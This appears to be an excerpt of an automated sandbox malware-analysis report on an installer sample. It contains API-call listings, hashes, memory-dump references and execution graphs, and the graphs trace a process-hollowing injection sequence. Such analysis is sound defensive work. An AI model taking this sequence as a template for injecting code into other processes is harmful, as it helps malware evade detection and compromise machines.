                                        • Opcode Fuzzy Hash: 144d1cdb2486664e6d23ee49b3a8b5b567b0fa6496f70557cebfe6cdbe3fdbb7
                                        • Instruction Fuzzy Hash: 3F312770A443048FDB04EF69C18469ABBF4FF49360F004669DC69CB345E730E895CB92
                                        APIs
                                        • EnterCriticalSection.KERNEL32(-0000001E,?,?,64943E7B), ref: 6494250A
                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,64943E7B), ref: 64942534
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: CriticalSection$EnterLeave
                                        • String ID:
                                        • API String ID: 3168844106-0
                                        • Opcode ID: 8d6f31208c6c891769c12a0327150ff20bd8a70b54c4cf2ae267cdaf45e9f6df
                                        • Instruction ID: 948d168694417bf1747ad4b7edd6ba750e37fcee7ac9fd1bd89b319705f02f13
                                        • Opcode Fuzzy Hash: 8d6f31208c6c891769c12a0327150ff20bd8a70b54c4cf2ae267cdaf45e9f6df
                                        • Instruction Fuzzy Hash: FD3169B06842018FEB04EF68C4C4A8A7BF5FF45394F1486A8DC29CF24AE734D954CB92
                                        APIs
                                        • EnterCriticalSection.KERNEL32 ref: 6494262A
                                        • LeaveCriticalSection.KERNEL32 ref: 64942654
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: CriticalSection$EnterLeave
                                        • String ID:
                                        • API String ID: 3168844106-0
                                        • Opcode ID: 20eff37dcb3e6fb4d222c5a5f359daafe4eaaed8bda04ee36ad6dfd160228958
                                        • Instruction ID: 571fba50d8fdd39084857e1df6229596c80e19e8161a0f3149117b77f92f4978
                                        • Opcode Fuzzy Hash: 20eff37dcb3e6fb4d222c5a5f359daafe4eaaed8bda04ee36ad6dfd160228958
                                        • Instruction Fuzzy Hash: 97314D706846018FEB44AF68D4C469A7BE5FF41394F148669DC28CF249E730E855CF91
                                        APIs
                                        • Sleep.KERNEL32(?,?,?,00000000,0041B019), ref: 0041AE47
                                        • EnterCriticalSection.KERNEL32(?,?,?,00000000,0041B019), ref: 0041AE78
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: CriticalEnterSectionSleep
                                        • String ID:
                                        • API String ID: 3080175056-0
                                        • Opcode ID: b33c2e26a2e7a715aa740edac844ca7d7708a8dc6e9aa8dac9ac65cc1fd076ea
                                        • Instruction ID: d8d0e4a1f4bcf70c3b2cfce43b048217999540070190b278a783b7a7432cba09
                                        • Opcode Fuzzy Hash: b33c2e26a2e7a715aa740edac844ca7d7708a8dc6e9aa8dac9ac65cc1fd076ea
                                        • Instruction Fuzzy Hash: 08115A714493408AEB21AB6CF8C51AA77A1E700310F59087BD449CB352D779DCD4C79F
                                        APIs
                                        • InitializeCriticalSection.KERNEL32(?,?,00000000,?,6494D46A,?,?,?,?,?,?,6494D088), ref: 6494D350
                                        • InitializeCriticalSection.KERNEL32(?,?,?,00000000,?,6494D46A,?,?,?,?,?,?,6494D088), ref: 6494D35C
                                        • EnterCriticalSection.KERNEL32(?,?,00000000,?,6494D46A,?,?,?,?,?,?,6494D088), ref: 6494D384
                                        • Sleep.KERNEL32(?,?,00000000,?,6494D46A,?,?,?,?,?,?,6494D088), ref: 6494D3B7
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: CriticalSection$Initialize$EnterSleep
                                        • String ID:
                                        • API String ID: 1117354567-0
                                        • Opcode ID: adba8577eb9842a5d559dd7343555ac41a7ca47f1b09d454f65f25cc6ffa8f56
                                        • Instruction ID: 84504e336a844e8ef7f576f541c23fda70678037849b65a2774ee7b9c7eb9a5b
                                        • Opcode Fuzzy Hash: adba8577eb9842a5d559dd7343555ac41a7ca47f1b09d454f65f25cc6ffa8f56
                                        • Instruction Fuzzy Hash: F91151B5D8C2108BDB14AF28E58625E3FBAFB93348F214625C44507708E775E454CB93
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: CriticalSection$EnterLeavefree
                                        • String ID:
                                        • API String ID: 4020351045-0
                                        • Opcode ID: 4f499a7b90442c8c2bab4f3e52ff716d3e2604547e9f8aad906c774e89dab4f1
                                        • Instruction ID: 73c5a2d2fda720497f3d0d1351f6375b6ab0b705e3c5ff1105677b11d6abe4d7
                                        • Opcode Fuzzy Hash: 4f499a7b90442c8c2bab4f3e52ff716d3e2604547e9f8aad906c774e89dab4f1
                                        • Instruction Fuzzy Hash: C9016DB8F8C2018FD708FF68C49551ABFE6FB12354B244968D8988B715E730D8949B83
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: CriticalSection$EnterErrorLastLeaveValue
                                        • String ID:
                                        • API String ID: 682475483-0
                                        • Opcode ID: 89afc76a486c7ef1475768313dbe8a74b8bdaf2f243c04161f9ae6257742ff8c
                                        • Instruction ID: c8cb59b92ffab9f19d76cd58b11827ce63718b8206acc4f51bfefb620be51544
                                        • Opcode Fuzzy Hash: 89afc76a486c7ef1475768313dbe8a74b8bdaf2f243c04161f9ae6257742ff8c
                                        • Instruction Fuzzy Hash: 42F0AFBA9486108FCB04FF79D599A0A7FFCEF96644B110528DD844B304E630E828CBE3
                                        APIs
                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,0040D577,?,?,?,?,?,0040CBD8), ref: 0040D31E
                                        • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,0040D577,?,?,?,?,?,0040CBD8), ref: 0040D345
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,0040D577,?,?,?,?,?,0040CBD8), ref: 0040D34C
                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,0040D577,?,?,?,?,?,0040CBD8), ref: 0040D36C
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: CriticalSection$EnterErrorLastLeaveValue
                                        • String ID:
                                        • API String ID: 682475483-0
                                        • Opcode ID: 8e48d2cee91d44542ce9fc17ac4c11135f3bbeabf599bde86060f2d1956b30a9
                                        • Instruction ID: 7c0080117eb7fa6b1ed1918a70c481f90c959e41decf58ebd3a84544f6c216b6
                                        • Opcode Fuzzy Hash: 8e48d2cee91d44542ce9fc17ac4c11135f3bbeabf599bde86060f2d1956b30a9
                                        • Instruction Fuzzy Hash: 1CF0A4719046908BCB107FB9EDC451B7BA4AB50750F05017DDE885B356DB38AD08CBAB

                                        Execution Graph

                                        Execution Coverage:21.6%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:12.4%
                                        Total number of Nodes:105
                                        Total number of Limit Nodes:2
                                        execution_graph 24319 551340e 24320 551341e 24319->24320 24323 5513458 24320->24323 24324 5513469 24323->24324 24328 5513a50 24324->24328 24362 5513a40 24324->24362 24325 551343e 24331 5513a90 24328->24331 24329 5514892 CreateProcessInternalW 24332 5514a33 24329->24332 24331->24329 24336 5513bd9 24331->24336 24357 5513a50 12 API calls 24331->24357 24358 5513a40 12 API calls 24331->24358 24396 55148a6 24331->24396 24333 5513d14 24333->24336 24400 5516218 24333->24400 24404 5516220 24333->24404 24334 5513e7f 24408 55162d0 24334->24408 24412 55162d8 24334->24412 24335 5513ebb 24335->24336 24416 55163b0 24335->24416 24420 55163aa 24335->24420 24336->24325 24337 551419e 24339 55141dd 24337->24339 24424 5516472 24337->24424 24428 5516478 24337->24428 24338 5513f91 24338->24329 24338->24336 24338->24337 24355 55163b0 WriteProcessMemory 24338->24355 24356 55163aa WriteProcessMemory 24338->24356 24339->24329 24339->24336 24340 551445c 24339->24340 24351 55163b0 WriteProcessMemory 24340->24351 24352 55163aa WriteProcessMemory 24340->24352 24341 5514485 24341->24336 24342 55145db 24341->24342 24347 5516472 Wow64SetThreadContext 24341->24347 24348 5516478 Wow64SetThreadContext 24341->24348 24342->24336 24432 5516538 24342->24432 24436 5516530 24342->24436 24347->24342 24348->24342 24351->24341 24352->24341 24355->24338 24356->24338 24357->24333 24358->24333 24366 5513a50 24362->24366 24363 5514892 CreateProcessInternalW 24365 5514a33 24363->24365 24366->24363 24375 5513bd9 24366->24375 24393 5513a50 12 API calls 24366->24393 24394 5513a40 12 API calls 24366->24394 24395 55148a6 CreateProcessInternalW 24366->24395 24367 5513d14 24367->24375 24389 5516220 NtUnmapViewOfSection 24367->24389 24390 5516218 NtUnmapViewOfSection 24367->24390 24368 5513e7f 24377 55162d0 NtAllocateVirtualMemory 24368->24377 24378 55162d8 NtAllocateVirtualMemory 24368->24378 24369 5513ebb 24369->24375 24381 55163b0 WriteProcessMemory 24369->24381 24382 55163aa WriteProcessMemory 24369->24382 24370 551419e 24372 55141dd 24370->24372 24385 5516472 Wow64SetThreadContext 24370->24385 24386 5516478 Wow64SetThreadContext 24370->24386 24371 5513f91 24371->24363 24371->24370 24371->24375 24391 55163b0 WriteProcessMemory 24371->24391 24392 55163aa WriteProcessMemory 24371->24392 24372->24363 24373 551445c 24372->24373 24372->24375 24387 55163b0 WriteProcessMemory 24373->24387 24388 55163aa WriteProcessMemory 24373->24388 24374 5514485 24374->24375 24376 55145db 24374->24376 24383 5516472 Wow64SetThreadContext 24374->24383 24384 5516478 Wow64SetThreadContext 24374->24384 24375->24325 24376->24375 24379 5516530 ResumeThread 24376->24379 24380 5516538 ResumeThread 24376->24380 24377->24369 24378->24369 24379->24375 24380->24375 24381->24371 24382->24371 24383->24376 24384->24376 24385->24372 24386->24372 24387->24374 24388->24374 24389->24368 24390->24368 24391->24371 24392->24371 24393->24367 24394->24367 24395->24367 24397 551492c CreateProcessInternalW 24396->24397 24399 5514a33 24397->24399 24401 551621b 24400->24401 24402 551626a NtUnmapViewOfSection 24400->24402 24401->24402 24403 5516294 24402->24403 24403->24334 24405 5516260 NtUnmapViewOfSection 24404->24405 24407 5516294 24405->24407 24407->24334 24409 55162d3 NtAllocateVirtualMemory 24408->24409 24411 551636a 24409->24411 24411->24335 24413 5516322 NtAllocateVirtualMemory 24412->24413 24415 551636a 24413->24415 24415->24335 24417 55163f0 WriteProcessMemory 24416->24417 24419 551642d 24417->24419 24419->24338 24421 55163b0 WriteProcessMemory 24420->24421 24423 551642d 24421->24423 24423->24338 24425 5516478 Wow64SetThreadContext 24424->24425 24427 55164ec 24425->24427 24427->24339 24429 55164b8 Wow64SetThreadContext 24428->24429 24431 55164ec 24429->24431 24431->24339 24433 5516578 ResumeThread 24432->24433 24435 55165a9 24433->24435 24435->24336 24437 5516538 ResumeThread 24436->24437 24439 55165a9 24437->24439 24439->24336 24440 2bf0910 24441 2bf0936 24440->24441 24445 55a6c60 24441->24445 24449 55a6bf0 24441->24449 24442 2bf098d 24446 55a6c9e GetConsoleWindow 24445->24446 24448 55a6cce 24446->24448 24448->24442 24450 55a6c0a 24449->24450 24451 55a6c2a 24450->24451 24452 55a6ca8 GetConsoleWindow 24450->24452 24451->24442 24453 55a6cce 24452->24453 24453->24442

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 738 5513a50-5513b64 749 5513b72-5513b7a 738->749 750 5513b66-5513b70 738->750 751 5513b9b-5513bcc 749->751 750->749 752 5513b7c-5513b86 750->752 755 5513bd9-5513bdb 751->755 756 5513bce-5513bd7 751->756 753 5514897-5514938 752->753 754 5513b8c-5513b95 752->754 764 5514943-551494a 753->764 765 551493a-5514940 753->765 754->751 758 5514885-5514891 755->758 756->755 757 5513be0-5513be9 756->757 759 5513bf2-5513c11 757->759 760 5513beb-5513bed 757->760 759->753 763 5513c17-5513c8f 759->763 760->758 781 5513c91-5513c98 763->781 782 5513ca0-5513ca7 763->782 767 5514955-551496d 764->767 768 551494c-5514952 764->768 765->764 769 551496f-551497b 767->769 770 551497e-5514a31 CreateProcessInternalW 767->770 768->767 769->770 776 5514a33-5514a39 770->776 777 5514a3a-5514a8e 770->777 776->777 789 5514aa0-5514aa7 777->789 790 5514a90-5514a96 777->790 783 5514892 781->783 784 5513c9e 781->784 782->783 785 5513cad-5513d0f call 5515e6f 782->785 783->753 784->785 981 5513d12 call 5513a50 785->981 982 5513d12 call 5513a40 785->982 983 5513d12 call 55148a6 785->983 791 5514aa9-5514ab8 789->791 792 5514abe 789->792 790->789 791->792 795 5514abf 792->795 795->795 797 5513d14-5513d16 798 5513e06-5513e7a 797->798 799 5513d1c-5513d2f 797->799 977 5513e7d call 5516220 798->977 978 5513e7d call 5516218 798->978 800 5513d35-5513d79 799->800 801 5513dff-5513e01 799->801 800->801 808 5513d7f-5513dfa 800->808 801->758 808->801 814 5513e7f-5513eb6 984 5513eb9 call 55162d0 814->984 985 5513eb9 call 55162d8 814->985 820 5513ebb-5513ebd 821 5513ec3-5513ef3 820->821 822 5513f54-5513f8c 820->822 821->822 829 5513ef5-5513f4f 821->829 968 5513f8f call 55163b0 822->968 969 5513f8f call 55163aa 822->969 827 5513f91-5513f93 830 5513f99-5513fc9 827->830 831 551402a-551403a 827->831 829->758 830->831 848 5513fcb-5514025 830->848 832 5514040-55140f3 831->832 833 551419e-55141a4 831->833 870 55140f5-55140fc 832->870 871 5514104-551410b 832->871 834 55141aa-55141d8 833->834 835 551428e-55142c3 833->835 972 55141db call 5516472 834->972 973 55141db call 5516478 834->973 854 55142c9-55142f9 835->854 855 551435a-55143a3 835->855 848->758 851 55141dd-55141df 851->855 856 55141e5-5514215 851->856 854->855 880 55142fb-5514355 854->880 872 55143a5-55143c1 855->872 856->855 882 551421b-5514289 856->882 870->783 874 5514102 870->874 871->783 875 5514111-5514141 871->875 872->753 886 55143c7-55143ce 872->886 874->875 878 5514143-551414a 875->878 879 5514152-5514159 875->879 878->783 884 5514150 878->884 879->783 885 551415f-5514178 879->885 880->758 882->758 884->885 979 551417b call 55163b0 885->979 980 551417b call 55163aa 885->980 887 55143d0-55143dc 886->887 888 55143de-55143e5 886->888 891 55143e7-551444d 887->891 888->872 888->891 903 551444f-5514456 891->903 904 551445e-5514465 891->904 893 551417d-5514198 893->832 893->833 903->783 905 551445c 903->905 904->783 906 551446b-5514480 904->906 905->906 974 5514483 call 55163b0 906->974 975 5514483 call 55163aa 906->975 909 5514485-5514487 912 5514565-551458e 909->912 913 551448d-55144d8 909->913 916 55146b4-55146fd 912->916 917 5514594-55145d6 912->917 913->912 925 55144de-5514560 913->925 928 5514703-5514747 916->928 929 55147d4-551480f 916->929 970 55145d9 call 5516472 917->970 971 55145d9 call 5516478 917->971 925->758 927 55145db-55145dd 927->929 930 55145e3-5514627 927->930 928->929 944 551474d-55147cf 928->944 966 5514812 call 5516530 929->966 967 5514812 call 5516538 929->967 930->929 945 551462d-55146af 930->945 941 5514814-5514880 941->758 944->758 945->758 966->941 967->941 968->827 969->827 970->927 971->927 972->851 973->851 974->909 975->909 977->814 978->814 979->893 980->893 981->797 982->797 983->797 984->820 985->820
                                        APIs
                                        • CreateProcessInternalW.KERNELBASE(?,?,?,?,0000000A,?,?,0000010B,?,?,?,?), ref: 05514A1E
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1828653140.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_5510000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID: CreateInternalProcess
                                        • String ID:
                                        • API String ID: 2186235152-0
                                        • Opcode ID: 86be4c717f68af79c748b1561e91557ae708f12516b5867314b7dc487e96268e
                                        • Instruction ID: a62d10e6cd51e7f956f0d688f1cf9c534fdbacb59ec1295aca4d8db65edef554
                                        • Opcode Fuzzy Hash: 86be4c717f68af79c748b1561e91557ae708f12516b5867314b7dc487e96268e
                                        • Instruction Fuzzy Hash: EBA2D974E00219DFDB54DF65C990AADB7B3FF88310F1485A9D819AB294DB35AE82CF40

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 997 2bfb950-2bfb984 1000 2bfb986-2bfb98f 997->1000 1001 2bfb992-2bfb9a5 997->1001 1000->1001 1002 2bfb9ab-2bfb9ae 1001->1002 1003 2bfbc15-2bfbc19 1001->1003 1004 2bfb9bd-2bfb9c9 1002->1004 1005 2bfb9b0-2bfb9b5 1002->1005 1006 2bfbc2e-2bfbc38 1003->1006 1007 2bfbc1b-2bfbc2b 1003->1007 1009 2bfb9cf-2bfb9e1 1004->1009 1010 2bfbc53-2bfbc99 1004->1010 1005->1004 1007->1006 1014 2bfbb4d-2bfbb5b 1009->1014 1015 2bfb9e7-2bfba3a 1009->1015 1017 2bfbc9b-2bfbca5 1010->1017 1018 2bfbca8-2bfbcd0 1010->1018 1021 2bfbb61-2bfbb6f 1014->1021 1022 2bfbbe0-2bfbbe2 1014->1022 1045 2bfba3c-2bfba48 call 2bfb688 1015->1045 1046 2bfba4a 1015->1046 1017->1018 1041 2bfbcd6-2bfbcef 1018->1041 1042 2bfbe25-2bfbe43 1018->1042 1025 2bfbb7e-2bfbb8a 1021->1025 1026 2bfbb71-2bfbb76 1021->1026 1027 2bfbbe4-2bfbbea 1022->1027 1028 2bfbbf0-2bfbbf3 1022->1028 1025->1010 1032 2bfbb90-2bfbbbf 1025->1032 1026->1025 1030 2bfbbee 1027->1030 1031 2bfbbec 1027->1031 1150 2bfbbf6 call 2bfbe87 1028->1150 1151 2bfbbf6 call 2bfb950 1028->1151 1152 2bfbbf6 call 2bfb940 1028->1152 1153 2bfbbf6 call 2bfbc60 1028->1153 1030->1028 1031->1028 1049 2bfbbc1-2bfbbce 1032->1049 1050 2bfbbd0-2bfbbde 1032->1050 1035 2bfbbfc 1036 2bfbbfe-2bfbc0f 1035->1036 1036->1002 1036->1003 1056 2bfbe06-2bfbe1f 1041->1056 1057 2bfbcf5-2bfbd0b 1041->1057 1061 2bfbeae-2bfbeb8 1042->1061 1062 2bfbe45-2bfbe67 1042->1062 1052 2bfba4c-2bfba5c 1045->1052 1046->1052 1049->1050 1050->1003 1063 2bfba5e-2bfba75 1052->1063 1064 2bfba77-2bfba79 1052->1064 1056->1041 1056->1042 1057->1056 1079 2bfbd11-2bfbd5f 1057->1079 1082 2bfbeb9-2bfbf0a call 2bf76f8 1062->1082 1083 2bfbe69-2bfbe85 1062->1083 1063->1064 1065 2bfba7b-2bfba89 1064->1065 1066 2bfbac2-2bfbac4 1064->1066 1065->1066 1078 2bfba8b-2bfba9d 1065->1078 1071 2bfbac6-2bfbad0 1066->1071 1072 2bfbad2-2bfbad5 1066->1072 1071->1072 1084 2bfbb1b-2bfbb27 1071->1084 1155 2bfbad8 call 2bfc041 1072->1155 1156 2bfbad8 call 2bfc050 1072->1156 1077 2bfbade-2bfbae2 1085 2bfbb0d-2bfbb13 call 2bfc2a9 1077->1085 1086 2bfbae4-2bfbaf2 1077->1086 1093 2bfba9f-2bfbaa1 1078->1093 1094 2bfbaa3-2bfbaa7 1078->1094 1127 2bfbd89-2bfbdad 1079->1127 1128 2bfbd61-2bfbd87 1079->1128 1116 2bfbf0c-2bfbf28 call 2bf6da0 1082->1116 1117 2bfbf2a-2bfbf59 call 2bf6438 * 3 1082->1117 1091 2bfbea9-2bfbeac 1083->1091 1084->1036 1097 2bfbb2d-2bfbb3d 1084->1097 1095 2bfbb19 1085->1095 1098 2bfbb05-2bfbb08 1086->1098 1099 2bfbaf4-2bfbb03 1086->1099 1091->1061 1100 2bfbe93-2bfbe96 1091->1100 1101 2bfbaad-2bfbabc 1093->1101 1094->1101 1095->1084 1114 2bfbb45-2bfbb48 1097->1114 1098->1003 1099->1084 1100->1082 1104 2bfbe98-2bfbea8 1100->1104 1101->1066 1112 2bfbc39-2bfbc4c 1101->1112 1104->1091 1112->1010 1114->1003 1116->1117 1137 2bfbf61-2bfbf68 1117->1137 1140 2bfbddf-2bfbdf8 1127->1140 1141 2bfbdaf-2bfbdc6 1127->1141 1128->1127 1144 2bfbdfa 1140->1144 1145 2bfbe03 1140->1145 1147 2bfbdc8-2bfbdcb 1141->1147 1148 2bfbdd2-2bfbddd 1141->1148 1144->1145 1145->1056 1147->1148 1148->1140 1148->1141 1150->1035 1151->1035 1152->1035 1153->1035 1155->1077 1156->1077
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q
                                        • API String ID: 0-388095546
                                        • Opcode ID: 63527874338152511fcc20e10c389431aeda0b58f618744f6269f9eb7212b63b
                                        • Instruction ID: 86c73e465fa8188cfef3dc67e60baa8ce76cc9c47f564bd996b347a2ae6d7984
                                        • Opcode Fuzzy Hash: 63527874338152511fcc20e10c389431aeda0b58f618744f6269f9eb7212b63b
                                        • Instruction Fuzzy Hash: 21124934B002058FCB54DF69C594AAEBBF6FF88704B1485A9E906EB365DB31DC46CB90

